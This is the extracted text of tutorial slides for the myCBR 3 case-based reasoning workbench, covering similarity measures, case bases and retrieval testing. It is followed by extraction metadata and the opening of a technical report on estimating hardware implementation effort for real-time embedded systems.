You should use advanced similarity mode in case your similarity measure function cannot be represented by the standard similarity mode.
Options for the Global similarity measure are:
- Weighted sum: use weights on the attributes
- Euclidian
- Minimum: of the local similarities (max(weight*local_sim))
- Minimum: of the local similarities (min(weight*local_sim))
Select the concept to model the global similarity measure for. In this example the global similarity of the concept ‘Car’ is modelled.
The global similarity function (Amalgamation function) selected for this concept. You can add alternative global similarity functions, analogue to the definition of alternative SMF’s for Attributes.
The SMF (Similarity Function) in use for this attribute, Click the field to select a SMF from the available SMF’s for the Attribute.
Set the Attribute as to be included in the global similarity calculation or not.
Set the weight of the attribute (It’s a good idea to use 100 as an overall value for the case and distribute it as weights onto the attributes).
Options for the Global similarity measure are:
- Weighted sum: use weights on the attributes
- Euclidian
- Minimum: of the local similarities (max(weight*local_sim))
- Minimum: of the local similarities (min(weight*local_sim))
Edit similarity measures: Global Similarity Measure
The global similarity function to use is selected by right clicking the desired function and then Set it as the active amalgamation function.
The Concept Explanation Tab lets you provide explanations about the concepts' nature and/or purpose as well as to provide URL's pointing to explanatory artefacts.
Add a short descriptive text that explains the nature and/or purpose of the concept.
Add a URL to a resource that helps explaining the concept.
Add: Opens a dialog in which you can specify further URL's that point to resources that explain the concept.
Remove: Removes a selected URL entry from the list.
Edit similarity measures: Attribute Explanation
The Concept Explanation Tab enables you to provide explanations about the selected attributes nature and/or purpose as well as to provide URL’s pointing to explanatory artefacts.
Add: Opens a dialog in which you can specify further URL’s that point to resources that explain the attribute. Remove: Removes a selected URL entry from the list.
Add a short descriptive text that explains the nature and/or purpose of the attribute.
Add a URL to a resource that helps explaining the attribute.
Short description: In automobile engines, "cc" refers to the total volume of its engine displacement in cubic centimetres. For example if the vehicle engine size is stated as 2300 cc, that would equate to 2.3 l engine size (since 1000 cc = 1 l).
Edit similarity measures: Define Attribute: Symbol
Name: Enter the name of the attribute
Type: Symbol(ic)
This is automatically chosen, depending on the type you specified for the attribute.
The list of values (Symbols) the attribute has
Add: Lets you add symbols to the list of defined symbols for the attribute
Note: As long as you don’t cancel the dialog you will be asked to enter further symbols
Rename: Lets you rename a selected symbol from the list
Remove: Removes the selected symbol from the list
Edit similarity measure: Define Attribute: Integer
Editing float similarity measures works analogue
Name: Enter the name of the attribute
Type: Integer
Multiple: ?
Enter the allowed Minimum and Maximum values for this attribute.
Concept Information
Double clicking a concept brings up its information's, these are its Name and the SMF used on it.
The name of the concept. To rename it simply enter a new name here.
The available and used SMF for the concept.
Project Information
The SMF shown here specifies how special values (like unknown, unspecified) are handled within the project. Please see the next slide on this.
Double clicking a project brings up its information's, these are its Name and the SMF used on it.
The name of the concept. To rename it simply enter a new name here. You can also provide Information about the author of the project.
The SMF shown here specifies how special values (like unknown, unspecified) are handled within the project. Please see the next slide on this.
The SMF of the project defines the handling of the special values for attribute. These values are: _others_, _undefined_, _unknown_.
The SIM describes how similar these special values are to each other. You can define the way your CBR engine handles unknown data by changing this SIM.
Others: If the value/range for an Attribute is not provided by the CBR engine the user can chose “other”
Unknown: If the value/range for an Attribute is not known by the user, he can chose “unknown”
Undefined: If a user doesn’t want to specify the value/range for an Attribute he can chose “undefined”
Retrieval
The concept car is selected as the concept to start a retrieval for.
This list shows the result set of a retrieval. The overall similarity is shown and also used to sort the retrieved cases by their similarity to the case specified in the retrieval query.
Select a case base from the available case bases within your project via this dropdown menu.
Change: Allows you to select a new symbol from the list of symbols that are defined for the Attribute.
Special value: Allows you to select a special value (like “unknown”) for the attribute. This is useful to formulate sparse queries.
List view of the cases present in the selected case base.
This input form lets you specify concrete values for all attributes. By specifying attribute values you formulate your query to the system.
Start retrieval: Start the retrieval process on the selected case base with the specified query.
List view of the cases present in the selected case base.
Initial Case Bases perspective view (Project selected)
The Case Bases perspective allows you to add/remove and modify the data within your cases and subsequently case base(s) after modelling your domain knowledge in the Modelling perspective.
You have to select a project to work on its case base(s).
Add and delete case bases.
The Case Base Tab is selected: This Tab lets you add and delete case bases.
The case base(s) used within the project are listed here, if a project is selected.
Case base browsing, Case viewing
Display of the selected case base's name
The case view displays the individual data (values of the Attributes) of a selected case
Clicking a case in the case list brings up the individual data of this case in the case view
Double clicking a case base brings up its Cases in the case list.
The Concept car is selected, which allows to add/remove and edit Instances (cases) of this concept.
Delete the selected Instance
Add a new Instance
The Instance tab is selected: This Tab lets you add and delete case(s) / Instances of the selected concept.
The selected case from the list of cases (Instances) in the currently selected case base, available for the selected concept (car) is shown in the Instance view.
Overview of the selected Instance of a concept (selected case)
Within this detailed view you can enter/change the data (attribute values) of a case.
Adding a new Instance: Entering the attribute values
For every attribute not of the data type symbol you can click into the field to directly enter a value for the attribute, for example an integer number.
A new tab is opened when a new instance is created, displaying the ID of the new instance.
For all attributes of the data type “symbol” by clicking “Change” a symbol can be assigned as the value of the attribute.
“undefined” is the default value for all attribute values. By clicking here you can change the value to a different special value: “unknown”.
The Concept car is selected, which allows to add/remove and edit Instances (cases) of this concept.
Filter integration is not yet enabled
Click here to create a new instance
Make sure to save your Project after adding new Instances to your case base(s)
“undefined” is the default value for all attribute values. By clicking here you can change the value to a different special value: “unknown”.
Filter integration is not yet enabled
Click here to create a new instance
Make sure to save your Project after adding new Instances to your case base(s)
Adding new Instances: Importing from CSV files
To import cases for a concept (Instances of the concept) right click the concept and select “Import cases from CSV file” in the context menu.
Adding new Instances: Importing from CSV files
In the upcoming dialogue you can specify the csv file to load and the separators that are used within the specified csv file. The dialogue will show you a preview of the data found in the csv file you specified using the separators you specified. To import this data click on “Finish”.
![Image of the CSV import dialogue]
```plaintext
<table>
<thead>
<tr>
<th>Name</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>AMD Athlon 64 22 5200+</td>
</tr>
<tr>
<td>1</td>
<td>AMD Athlon XP 2600</td>
</tr>
<tr>
<td>2</td>
<td>AMD Athlon XP 3600+</td>
</tr>
<tr>
<td>3</td>
<td>AMD Athlon XP 4600+</td>
</tr>
<tr>
<td>4</td>
<td>AMD Athlon X2 3.45</td>
</tr>
<tr>
<td>5</td>
<td>AMD Athlon X2 4600</td>
</tr>
</tbody>
</table>
```
Adding the new Instances to a case base
The imported instances can now be added to a (selected) case base by dragging and dropping them into the case base’s “Cases” field.
You always drag and drop your new instances into the case base, regardless if imported or generated or entered.
Make sure to save your Project after adding new Instances to your case base(s).
Deleting an Instances from the case base
Select the Instance(s) to be deleted and then click on the Delete button (To view the deletion update the case base view (re open it) manually for now.)
Adding a new case base to a project
Select the project you want to add a case base to
Click here to create a new case base for the currently selected project
Name the new case base and press “Ok”
Deleting a case base from a project
Select the project you want to delete a case base from
Click here to delete the selected case base
Select the case base you want to delete
Deleting a case base from a project
Select the project you want to delete a case base from.
Click here to delete the selected case base.
Select the case base you want to delete.
myCBR Getting started: Modeling your domain
Start up myCBR
Starting up myCBR will bring up the UI as seen above. From this point on you can either start a new project or load an existing project.
Create a new project
Selecting “New Project” from the “File” context menu for now will start our new example project.
Create a new project
In the “New Project” dialog, specify the name of the new project and where to store it, then press “Save”
Our new project for this example will be named “NewExampleProject”
Create a new project
After creating and double-clicking the new project myCBR should present you with a view like this.
Add a concept to the project
1) Select the project to add a concept to
2) Click on “Add a concept”
3) In the dialog, enter the concept’s name
4) Confirm the creation of the concept by clicking OK
Add a concept to the project
1) Double-clicking your project expands the concept tree which now should be populated by the concept “Car”.
2) Double-clicking the concept “Car” should open the basic concept view as shown in this screenshot.
Add an attribute to the concept “Car”
1) Select the concept you want to add an attribute to. In our example we selected the attribute “Car”.
2) Click on “Add new attribute”.
3) In the dialog, enter the attributes name.
4) Also in the dialog select the attributes data type by clicking on the drop down menu “Type” and selecting the data type you want for the attribute, in our example this is the data type “Symbol”.
5) Confirm the creation of the attribute by clicking on the “Finish” button.
Entering values for an attribute of the symbol data type
1) Select the attribute you want to enter values for.
2) Click on “Add” (a value)
3) Enter the value, in our example: Enter a string describing a colour.
4) Confirm the value by clicking “OK”. The dialog will reappear to allow you to enter further values. To stop entering values just click on “Cancel”.
Modeling a similarity measure for a symbol attribute
1) Finish entering all the values you want the attribute to have
2) Select the attribute (if not already working on the attribute and thus having it selected anyway).
3) Either double-click the default function to edit it or rather click on “Add new function” to add a new similarity measure (function).
Modeling a similarity measure for a symbol attribute
1) Enter a name for the new function
2) Select the kind of the new function
3) Confirm your entries by clicking on “Finish”
Modeling a similarity measure for a symbol attribute
1) You can choose between a symmetric or asymmetric matrix.
2) You can enter values between 0.0 and 1.0 by directly clicking into a field.
3) The values are also color-coding their cells to help you with visual feedback while modeling your similarity measure.
Modeling a similarity measure as a symbol taxonomy
- You can choose between a symmetric or asymmetric calculation.
- You can specify distinct ways to describe (calculate) the similarity for the query and for the case comparison.
- You can arrange the symbols in the taxonomy by drag & drop.
Assigning a similarity measure to an attribute
1) Double-click the concept that contains the attribute you want to assign a similarity measure for.
2) Double-click the global similarity measure of the concept (car in our case) default function (or the currently selected similarity measure for the concept).
3) Select the desired similarity measure from the drop down menu “SMF”. In our example we are choosing “SimColorTaxonomy” as the similarity measure to be used to compute the local similarity of two symbols representing a colour within a query and our cases.
Adding a similarity measure for a float attribute
For float, as well as integer attributes, you are required to enter a minimum and maximum value wherein the minimum requires to be lower than the maximum value.
After adding a new attribute of the data type float you can again specify its name.
Access the attributes characteristics by double-clicking it.
Modeling a similarity measure for a float attribute
You can select symmetric or asymmetric behaviour of the function. In our example we have chosen an asymmetric function.
You can decide if you want to have the plain distance or a quotient calculated as a similarity value.
In asymmetric mode this set (the left one) of options shapes the half of the function that calculates the similarity for query values greater than the values in a given case.
In asymmetric mode this set (the right one) of options shapes the half of the function that calculates the similarity for query values smaller than the values in a given case.
As we want to model the idea that a higher price is bad we made the function rapidly decline the calculated similarity value after passing the query value (aka Having a higher price in the case then in the query).
Assigning the similarity measure to the float attribute
1) Double-click the concept that contains the attribute you want to assign a similarity measure for.
2) Double-click the global similarity measure of the concept (car in our case) default function (or the currently selected similarity measure for the concept).
3) Select the desired similarity measure from the drop down menu “SMF”. In our example we are choosing “SimPrice” as the similarity measure to be used to compute the local similarity of two float numbers representing a cars price within a query and our cases.
Adding explanations to a concept
Select the concept you want to add canned explanations and/or an explanatory artefact for.
You can enter a free text that will be available via the API as the canned explanation for this concept.
Or you can click “Add” to add a reference (URL) to an explanatory artefact (for example a webpage with further information about the concept) for the concept.
Remember that you have to click on the “concept Explanation” Tab to get to the Concept Explanation edit view. To normally keep working with the concept make sure you switch back to the “Concept” tab.
Modeling the global Similarity Measure
You can select the functions nature here. In the example we have chosen a weighted sum.
By setting “Discriminant” to “false” you exclude the local similarity value from being used in the calculation of the global similarity value.
Clicking in the “SMF” field allows you to choose one of the available similarity functions associated with the attribute.
Select the concept you want to define a global similarity measure for.
Double clicking in the “Weight” field allows you to enter a value for the weight of the local similarity measure associated with this field. The weighted sum of all local similarity measures will then form the global similarity between, in our example, one car and another. In our example “Price is now twice as important for the global similarity between two cars than “Color” is.
Select the concepts default function to edit it.
Doing a Retrieval test [1]
After adding a case-base to your project... [See Slide 85]
Doing a Retrieval test [2]
And adding some instances of the concept “car” aka “cases” to the case base... See slides: 82, 83
You are ready to do a retrieval test.
The retrieval GUI is shown
And explained again on the following slide.
Retrieval GUI
Reminder
The concept car is selected as the concept to start a retrieval for.
This input form lets you specify concrete values for all attributes. By specifying attribute values you formulate your query to the system.
Start retrieval: Start the retrieval process on the selected case base with the specified query.
This list shows the result set of a retrieval. The overall similarity is shown and also used to sort the retrieved cases by their similarity to the case specified in the retrieval query.
Doing a Retrieval test [3]
Seen in our example here: We did a retrieval with the query ‘Color = red and Price = 5500’.
As you can see the cases in our case base are not very discriminable with respect to their similarity to the query.
This is an effect caused by the attribute ‘Price’ which we defined with a value range of 0 to 1,000,000.
As we only have cases (aka cars) with a price up to 30,000 the value range for the attribute “Price” is far too wide for our data (cases) at hand right now.
How can we change our model to reflect this knowledge, gathered by retrieval testing?
See how, in the following section: Padding your knowledge model.
myCBR Getting started: Refining your knowledge model
Doing a Retrieval test (again) [4]
As we have seen our knowledge model is not yet accurate enough, as it was revealed by our first retrieval test at the end of the previous section). To amend the far to high value for “Price” we adapt price to 50000 and the cases become more distinguishable.
Changing the value range of the attribute “Price” to 0 to 50,000 and then redoing the retrieval with the same query as in our first retrieval test results in a far more distinguishable calculation of the case’s global similarities.
As you can see to the right, the similarities of the cases to the query are now more distinct and spread over the interval [0...1] than within the first retrieval test result depicted here again:
Thus, by adapting the value range of the attribute “Price”, based upon results from our first retrieval test, we enhanced the quality of our knowledge model and thus the retrieval results it provides.
After successful refinement: Save your model (project)
Select the project you want to save then in the “File” dialog select “Save” or “Save as”.
In the dialog select the place to save your project in, name it and click on “Save”.
Goals of knowledge model refinement
The goals of knowledge model refinement are:
Enhance the performance of your models retrieval
- Remove unnecessary attributes
- Reduce value ranges
- Streamline similarity measures
- Trim your case base (remove redundant, rarely used cases)
Enhance the accuracy of your model
- Refine similarity measures
- Add or diversify attributes to your concept
General tips for knowledge model refinement
**Enhance the performance of your models retrieval while not missing a thing:**
- Try to identify attributes that doesn’t have great impact on your retrieval, then remove them
- Reduce your similarity measures to the absolute necessary, as their computation takes most effort
- Monitor the frequency of your cases being retrieved, remove redundant or rarely used cases
- User-test your case base(s) to see if you have already integrated most of the cases a user can come up with in your domain context
**Enhance the accuracy of your model while keeping it lean:**
- Add or delete locale similarities from your global similarity measure to keep it lightweight but also precise enough
- ‘Sharpen’ your similarity measures by ranging the value ranges to ranges to be encountered in the day to day use of your model
- User-test the modelling of your concepts with users unfamiliar to your model to, this might yield valuable feedback to be integrated in your model
The cycle of knowledge model refinement
The cycle of knowledge model refinement offers the opportunity for iterative knowledge model optimisation even at runtime of your application. As the CBREngine respectively your knowledge model and data are modularised from your application (separated) you can optimise it and ‘re plug’ thus reintegrate the optimised version to your application and instantly benefit from the improvements within your live application. This way you can choose if you want to optimise your CBR Engine until you reach certain quality measures or want to constantly have it evolve during being used. Integrating the
- Perform a test series of retrievals on your model and subsequent data
- Initially model or ‘tweak’ your knowledge model in the workbench and / or create or optimise (add, reduce) your data (case bases(s))
- Evaluate your retrieval results with regard to performance and accuracy
Integrating the
|
{"Source-Url": "http://mycbr-project.net/downloads/myCBR_3_tutorial_slides.pdf", "len_cl100k_base": 13256, "olmocr-version": "0.1.50", "pdf-total-pages": 118, "total-fallback-pages": 0, "total-input-tokens": 185423, "total-output-tokens": 17577, "length": "2e13", "weborganizer": {"__label__adult": 0.00025725364685058594, "__label__art_design": 0.0004730224609375, "__label__crime_law": 0.0002167224884033203, "__label__education_jobs": 0.000935077667236328, "__label__entertainment": 6.282329559326172e-05, "__label__fashion_beauty": 0.0001131892204284668, "__label__finance_business": 0.00026297569274902344, "__label__food_dining": 0.00019800662994384768, "__label__games": 0.000732421875, "__label__hardware": 0.0004570484161376953, "__label__health": 0.0001647472381591797, "__label__history": 0.00017845630645751953, "__label__home_hobbies": 7.545948028564453e-05, "__label__industrial": 0.0002684593200683594, "__label__literature": 0.00018477439880371096, "__label__politics": 0.00012791156768798828, "__label__religion": 0.00030303001403808594, "__label__science_tech": 0.007259368896484375, "__label__social_life": 7.832050323486328e-05, "__label__software": 0.0192413330078125, "__label__software_dev": 0.9677734375, "__label__sports_fitness": 0.00017559528350830078, "__label__transportation": 0.0003428459167480469, "__label__travel": 0.00013017654418945312}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 59627, 0.00398]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 59627, 0.21138]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 59627, 0.7881]], "google_gemma-3-12b-it_contains_pii": [[0, 189, false], [189, 823, null], [823, 835, null], [835, 1326, null], [1326, 2161, null], [2161, 2688, null], [2688, 3265, null], [3265, 3977, null], [3977, 3991, null], [3991, 4884, null], [4884, 5493, null], [5493, 5991, null], [5991, 6552, null], [6552, 6568, null], [6568, 8296, null], [8296, 8382, null], [8382, 8980, null], [8980, 9771, null], [9771, 10711, null], [10711, 11486, null], [11486, 11505, null], [11505, 11984, null], [11984, 12199, null], [12199, 12233, null], [12233, 12483, null], [12483, 13113, null], [13113, 13315, null], [13315, 13497, null], [13497, 13780, null], [13780, 14139, null], [14139, 14403, null], [14403, 14526, null], [14526, 14617, null], [14617, 14746, null], [14746, 14967, null], [14967, 15004, null], [15004, 15802, null], [15802, 16120, null], [16120, 16304, null], [16304, 16470, null], [16470, 16492, null], [16492, 17209, null], [17209, 19130, null], [19130, 19988, null], [19988, 20754, null], [20754, 21405, null], [21405, 21940, null], [21940, 22645, null], [22645, 23267, null], [23267, 24074, null], [24074, 25027, null], [25027, 25545, null], [25545, 25939, null], [25939, 26536, null], [26536, 27636, null], [27636, 27980, null], [27980, 28714, null], [28714, 29949, null], [29949, 29979, null], [29979, 30976, null], [30976, 31831, null], [31831, 32180, null], [32180, 32527, null], [32527, 33233, null], [33233, 34413, null], [34413, 35542, null], [35542, 36511, null], [36511, 37550, null], [37550, 38703, null], [38703, 38898, null], [38898, 39370, null], [39370, 40159, null], [40159, 40669, null], [40669, 40901, null], [40901, 41134, null], [41134, 41676, null], [41676, 42267, null], [42267, 43223, null], [43223, 43716, null], [43716, 44041, null], [44041, 44614, null], [44614, 45735, null], [45735, 45925, null], [45925, 46536, null], [46536, 46903, null], [46903, 47098, null], [47098, 47297, null], [47297, 47475, null], [47475, 47656, null], [47656, 47700, null], [47700, 47853, null], [47853, 47972, null], [47972, 48168, null], [48168, 48289, null], [48289, 48486, null], [48486, 48727, null], [48727, 49226, null], [49226, 49591, null], [49591, 49951, null], [49951, 50129, null], [50129, 50445, null], [50445, 50737, null], [50737, 51306, null], [51306, 51665, null], [51665, 52509, null], [52509, 53089, null], [53089, 53681, null], [53681, 54581, null], [54581, 54668, null], [54668, 54904, null], [54904, 55425, null], [55425, 56079, null], [56079, 56132, null], [56132, 57058, null], [57058, 57290, null], [57290, 57682, null], [57682, 58691, null], [58691, 59627, null]], "google_gemma-3-12b-it_is_public_document": [[0, 189, true], [189, 823, null], [823, 835, null], [835, 1326, null], [1326, 2161, null], [2161, 2688, null], [2688, 3265, null], [3265, 3977, null], [3977, 3991, null], [3991, 4884, null], [4884, 5493, null], [5493, 5991, null], [5991, 6552, null], [6552, 6568, null], [6568, 8296, null], [8296, 8382, null], [8382, 8980, null], [8980, 9771, null], [9771, 10711, null], [10711, 11486, null], [11486, 11505, null], [11505, 11984, null], [11984, 12199, null], [12199, 12233, null], [12233, 12483, null], [12483, 13113, null], [13113, 13315, null], [13315, 13497, null], [13497, 13780, null], [13780, 14139, null], [14139, 14403, null], [14403, 14526, null], [14526, 14617, null], [14617, 14746, null], [14746, 14967, null], [14967, 15004, null], [15004, 15802, null], [15802, 16120, null], [16120, 16304, null], [16304, 16470, null], [16470, 16492, null], [16492, 17209, null], [17209, 19130, null], [19130, 19988, null], [19988, 20754, null], [20754, 21405, null], [21405, 21940, null], [21940, 22645, null], [22645, 23267, null], [23267, 24074, null], [24074, 25027, null], [25027, 25545, null], [25545, 25939, null], [25939, 26536, null], [26536, 27636, null], [27636, 27980, null], [27980, 28714, null], [28714, 29949, null], [29949, 29979, null], [29979, 30976, null], [30976, 31831, null], [31831, 32180, null], [32180, 32527, null], [32527, 33233, null], [33233, 34413, null], [34413, 35542, null], [35542, 36511, null], [36511, 37550, null], [37550, 38703, null], [38703, 38898, null], [38898, 39370, null], [39370, 40159, null], [40159, 40669, null], [40669, 40901, null], [40901, 41134, null], [41134, 41676, null], [41676, 42267, null], [42267, 43223, null], [43223, 43716, null], [43716, 44041, null], [44041, 44614, null], [44614, 45735, null], [45735, 45925, null], [45925, 46536, null], [46536, 46903, null], [46903, 47098, null], [47098, 47297, null], [47297, 47475, null], [47475, 47656, null], [47656, 47700, null], [47700, 47853, null], [47853, 47972, null], [47972, 48168, null], [48168, 48289, null], [48289, 48486, null], [48486, 48727, null], [48727, 49226, null], [49226, 49591, null], [49591, 49951, null], [49951, 50129, null], [50129, 50445, null], [50445, 50737, null], [50737, 51306, null], [51306, 51665, null], [51665, 52509, null], [52509, 53089, null], [53089, 53681, null], [53681, 54581, null], [54581, 54668, null], [54668, 54904, null], [54904, 55425, null], [55425, 56079, null], [56079, 56132, null], [56132, 57058, null], [57058, 57290, null], [57290, 57682, null], [57682, 58691, null], [58691, 59627, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 59627, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 59627, null]], "pdf_page_numbers": [[0, 189, 1], [189, 823, 2], [823, 835, 3], [835, 1326, 4], [1326, 2161, 5], [2161, 2688, 6], [2688, 3265, 7], [3265, 3977, 8], [3977, 3991, 9], [3991, 4884, 10], [4884, 5493, 11], [5493, 5991, 12], [5991, 6552, 13], [6552, 6568, 14], [6568, 8296, 15], [8296, 8382, 16], [8382, 8980, 17], [8980, 9771, 18], [9771, 10711, 19], [10711, 11486, 20], [11486, 11505, 21], [11505, 11984, 22], [11984, 12199, 23], [12199, 12233, 24], [12233, 12483, 25], [12483, 13113, 26], [13113, 13315, 27], [13315, 13497, 28], [13497, 13780, 29], [13780, 14139, 30], [14139, 14403, 31], [14403, 14526, 32], [14526, 14617, 33], [14617, 14746, 34], [14746, 14967, 35], [14967, 15004, 36], [15004, 15802, 37], [15802, 16120, 38], [16120, 16304, 39], [16304, 16470, 40], [16470, 16492, 41], [16492, 17209, 42], [17209, 19130, 43], [19130, 19988, 44], [19988, 20754, 45], [20754, 21405, 46], [21405, 21940, 47], [21940, 22645, 48], [22645, 23267, 49], [23267, 24074, 50], [24074, 25027, 51], [25027, 25545, 52], [25545, 25939, 53], [25939, 26536, 54], [26536, 27636, 55], [27636, 27980, 56], [27980, 28714, 57], [28714, 29949, 58], [29949, 29979, 59], [29979, 30976, 60], [30976, 31831, 61], [31831, 32180, 62], [32180, 32527, 63], [32527, 33233, 64], [33233, 34413, 65], [34413, 35542, 66], [35542, 36511, 67], [36511, 37550, 68], [37550, 38703, 69], [38703, 38898, 70], [38898, 39370, 71], [39370, 40159, 72], [40159, 40669, 73], [40669, 40901, 74], [40901, 41134, 75], [41134, 41676, 76], [41676, 42267, 77], [42267, 43223, 78], [43223, 43716, 79], [43716, 44041, 80], [44041, 44614, 81], [44614, 45735, 82], [45735, 45925, 83], [45925, 46536, 84], [46536, 46903, 85], [46903, 47098, 86], [47098, 47297, 87], [47297, 47475, 88], [47475, 47656, 89], [47656, 47700, 90], [47700, 47853, 91], [47853, 47972, 92], [47972, 48168, 93], [48168, 48289, 94], [48289, 48486, 95], [48486, 48727, 96], [48727, 49226, 97], [49226, 49591, 98], [49591, 49951, 99], [49951, 50129, 100], [50129, 50445, 101], [50445, 50737, 102], [50737, 51306, 103], [51306, 51665, 104], [51665, 52509, 105], [52509, 53089, 106], [53089, 53681, 107], [53681, 54581, 108], [54581, 54668, 109], [54668, 54904, 110], [54904, 55425, 111], [55425, 56079, 112], [56079, 56132, 113], [56132, 57058, 114], [57058, 57290, 115], [57290, 57682, 116], [57682, 58691, 117], [58691, 59627, 118]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 59627, 0.04401]]}
|
olmocr_science_pdfs
|
2024-12-03
|
2024-12-03
|
68807818f42c882ad8e08c5589fc80398463885a
|
[REMOVED]
|
{"len_cl100k_base": 12848, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 38692, "total-output-tokens": 14957, "length": "2e13", "weborganizer": {"__label__adult": 0.0004041194915771485, "__label__art_design": 0.00041294097900390625, "__label__crime_law": 0.0004570484161376953, "__label__education_jobs": 0.001934051513671875, "__label__entertainment": 0.0001361370086669922, "__label__fashion_beauty": 0.0002262592315673828, "__label__finance_business": 0.0009479522705078124, "__label__food_dining": 0.0005044937133789062, "__label__games": 0.0010576248168945312, "__label__hardware": 0.0011835098266601562, "__label__health": 0.0011749267578125, "__label__history": 0.0004949569702148438, "__label__home_hobbies": 0.0001684427261352539, "__label__industrial": 0.0006947517395019531, "__label__literature": 0.0006747245788574219, "__label__politics": 0.0003521442413330078, "__label__religion": 0.0005707740783691406, "__label__science_tech": 0.279052734375, "__label__social_life": 0.00013744831085205078, "__label__software": 0.02569580078125, "__label__software_dev": 0.6826171875, "__label__sports_fitness": 0.0002663135528564453, "__label__transportation": 0.000812530517578125, "__label__travel": 0.0002658367156982422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49067, 0.01826]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49067, 0.65356]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49067, 0.85843]], "google_gemma-3-12b-it_contains_pii": [[0, 5172, false], [5172, 11271, null], [11271, 17412, null], [17412, 18899, null], [18899, 24105, null], [24105, 29630, null], [29630, 32457, null], [32457, 34733, null], [34733, 38782, null], [38782, 44307, null], [44307, 49067, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5172, true], [5172, 11271, null], [11271, 17412, null], [17412, 18899, null], [18899, 24105, null], [24105, 29630, null], [29630, 32457, null], [32457, 34733, null], [34733, 38782, null], [38782, 44307, null], [44307, 49067, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49067, null]], "pdf_page_numbers": [[0, 5172, 1], [5172, 11271, 2], [11271, 17412, 3], [17412, 18899, 4], [18899, 24105, 5], [24105, 29630, 6], [29630, 32457, 7], [32457, 34733, 8], [34733, 38782, 9], [38782, 44307, 10], [44307, 49067, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49067, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-12
|
2024-12-12
|
feb434b370595c145bdc382665a9b6d9308ad61a
|
Technical Report
Real-Time Aware Hardware Implementation Effort Estimation
Abildgren, Rasmus; Diguet, Jean-Philippe ; Gogniat, Guy; Koch, Peter; Le Moullec, Yannick
Publication date:
2010
Document Version
Early version, also known as pre-print
Link to publication from Aalborg University
Citation for published version (APA):
Abstract—This paper presents a structured method and underlying models for estimating the hardware implementation effort of hard real-time constrained embedded systems. We propose an optimization model which takes some of the most common optimization techniques into account as well as the order in which they should be applied. We suggest a set of two metrics used to characterise the effects of optimisations: one expressing how hard it is to reach an implementation satisfying the real-time constraints for the implementation, and another one to reflects how the distribution of parallelism in an algorithm influences the impact of the optimisations. Experimental results do not show an unambiguous result. However, for most algorithms our approach enables the estimation of the hardware implementation effort of hard real-time constrained applications.
Index Terms—real-time; hardware; implementation; effort; FPGA
I. INTRODUCTION
The need for continuous innovation combined with growing complexity, increased product release frequency, increasing time-to-market pressure and fierce competition, make the task of project managers working in the embedded systems industry more and more challenging. For example, the 2009 Embedded Market Study [1] reports that 63% of the projects were not finished on schedule and that the average lateness is 4.4 months.
In this context, accurate development time estimates are an essential tool which can make the difference between success and failure. However, obtaining such estimates is not a trivial task since development time depends on many factors, including both technical (hardware and software e.g. products built upon new platforms, area/time/energy constraints), human (e.g. skills, mood of the developers), and managerial aspects.
Whereas methods and techniques are readily available for estimating the development time of software executing on GPPs [2], mainly for desktop applications, to the best of our knowledge little efforts have been carried out in the hardware domain. Working with a systematic approach for estimating the development time for different projects requires a certain maturity in the organisation. Many small and medium sized enterprises (SMEs) usually do not have such priorities, although they would benefit from it. Many SMEs perform "ad hoc" estimations (e.g. based on experience or intuition), but in many cases these ad hoc approaches do not provide accurate estimates, which in turn means delayed projects. This work proposes a method and tools which offer a systematic and structured approach for estimating more precisely the implementation effort.
A. Our Prior Work
The work presented in this paper is part of a larger effort aiming at improving this situation [3]. In this paper we describe our contribution regarding the problem of estimating the hardware implementation effort (in terms of development time) for real-time constrained applications. This contribution is an extension of what is summarized below.
